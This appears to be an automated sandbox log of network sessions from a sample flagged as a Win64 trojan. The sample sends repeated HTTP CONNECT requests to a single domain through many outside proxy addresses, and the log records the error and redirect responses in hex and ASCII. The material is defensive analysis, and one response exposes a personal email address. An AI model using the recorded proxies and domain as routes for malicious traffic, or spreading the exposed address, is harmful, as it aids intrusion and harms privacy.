                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                458192.168.2.851233142.54.235.941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.050549030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                459192.168.2.851591104.18.136.28805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.052907944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.143182039 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                460192.168.2.851598185.162.230.201805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.053257942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.143207073 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                461192.168.2.851569161.97.160.158597785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.055404902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.683049917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.398121119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.694987059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.992189884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.288683891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                462192.168.2.85157798.162.25.2341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.068428993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                463192.168.2.851531221.230.7.3990005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.071547985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                464192.168.2.851542171.247.241.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.072773933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                465192.168.2.851580199.188.93.21490005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.073568106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                466192.168.2.851579200.79.141.86805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.075566053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                467192.168.2.85157095.43.244.1541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.082204103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                468192.168.2.851611104.20.225.218805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.123008013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.211600065 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                469192.168.2.85155127.76.194.1310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.123229980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                470192.168.2.851613172.67.182.153805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.128742933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.216403961 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                471192.168.2.851583188.166.56.246805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.133260012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.747701883 CET536INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Server: Apache/2.4.38 (Debian)
                                                                                Content-Length: 614
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 6d 61 78 6c 65 67 67 69 65 72 69 40 67 6d 61 69 6c 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at maxleggieri@gmail.com to inform them
                                                                                Feb 23, 2024 14:28:26.747739077 CET270INData Raw: 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65
                                                                                Data Ascii: of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at api.growbot.dk Port 8


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                472192.168.2.851637104.20.123.164805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.137146950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.224860907 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                473192.168.2.85159570.166.167.38577285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.147867918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                474192.168.2.85159798.162.25.4316545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.148154974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                475192.168.2.851600194.145.209.18980835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.148462057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                476192.168.2.85112972.210.252.134461645828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.149002075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                477192.168.2.849756198.12.253.1371065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.149347067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.288609982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.381695032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382715940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.398019075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.397839069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.429182053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                478192.168.2.849715117.54.114.103805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.169802904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                479192.168.2.849716146.56.101.184216815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.172023058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                480192.168.2.84976551.250.13.88805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.180932045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.194955111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.195270061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.288875103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.382422924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.382253885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.397838116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                481192.168.2.85157220.210.113.3281235828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.181497097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.460062027 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                482192.168.2.851649184.60.66.122805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.188321114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.324625969 CET1286INHTTP/1.1 302 Found
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Server: Apache/2.4.56 (Debian)
                                                                                Location: https://heygirlisheeverythingyouwantedinaman.com:443/index.php
                                                                                Content-Length: 3239
                                                                                Content-Type: text/html; charset=UTF-8
